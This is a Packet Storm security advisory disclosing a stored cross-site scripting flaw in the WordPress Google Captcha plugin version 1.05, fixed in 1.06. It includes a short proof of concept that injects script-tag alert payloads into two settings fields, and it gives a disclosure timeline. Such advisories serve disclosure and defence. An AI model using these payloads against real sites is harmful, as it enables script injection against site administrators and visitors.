WordPress Google Captcha 1.05 Cross Site Scripting

Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00


                                            `Plugin Name : Google Captcha (reCAPTCHA)  
Effected Version : 1.05 (and most probably lower version's if any)  
Vulnerability : A3-Cross-Site Scripting (XSS)  
Identified by : Madhu Akula  
Technical Details  
Minimum Level of Access Required : Administrator  
PoC - (Proof of Concept) :  
The following fields put the payload as below  
gglcptch_public_key = “><script>alert(1)</script>  
gglcptch_private_key = “><script>alert(2)</script>  
Vulnerable Parameter : gglcptch_public_key, gglcptch_private_key  
Type of XSS : Stored  
Fixed in : 1.06  
Disclosure Timeline  
Vendor Contacted : 2014-08-04  
Plugin Status : Updated on 2014-08-07  
Public Disclosure : October 3, 2015  
CVE Number : Not assigned yet  
Plugin Description :  
The Google Captcha plugin allows you to implement a super security captcha form into web forms. Google Captcha is a free CAPTCHA service that helps to digitize books, newspapers and old time radio shows. This captcha can be used for login, registration, password recovery, comments forms.